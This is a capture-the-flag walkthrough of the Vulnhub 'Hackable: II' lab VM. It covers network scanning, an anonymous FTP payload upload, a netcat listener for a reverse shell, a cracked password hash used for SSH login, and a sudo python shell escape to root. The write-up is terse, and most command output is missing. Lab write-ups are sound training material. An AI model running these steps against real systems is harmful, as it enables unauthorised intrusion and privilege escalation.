HACKABLE: II -: (Vulnhub) Walkthrough
I personally enjoyed playing with this box, this box taught me how to stay focused while doing enumeration and exploitation. There’s so much going on with this box for post exploitation. let’s pwn it ..!!!
Here is the link to downlaod this VM:-
Network Scanning
We always start with network scanning, Let’s find the target IP address by running netdiscover.
┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0
As we saw in netdiscover result. Our target ip address is 192.168.118.166
Enumeration/Reconnaissance
Our next step is scanning the target machine. let’s start with nmap.
┌─[✗]─[root@RDX]─[~]
└──╼ #nmap -v -sT 192.168.118.166 -p- -sV -A -O
http://192.168.118.166/
We have an FTP server that has allowed anonymous access and try to upload a payload.
┌─[root@RDX]─[~]
└──╼ #ftp 192.168.118.166
http://192.168.118.166/files/
┌─[root@RDX]─[~]
└──╼ #nc -nlvp 443
$ id
$ cd /home
$ ls
$ cat important.txt
now i got hash
hash=cf4c2232354952690368f1b3dfdfb24d = onion
┌─[root@RDX]─[~]
└──╼ #ssh shrek@192.168.118.166
shrek@ubuntu:~$ ls
shrek@ubuntu:~$ cat user.txt
Privilege Escalation
shrek@ubuntu:~$ sudo -l
shrek@ubuntu:~$ sudo python3.5 -c ‘import os; os.system(“/bin/sh”)’
# id
# cd /root
# ls
# cat root.txt
Successfully got the root privilege and the ‘root.txt’ .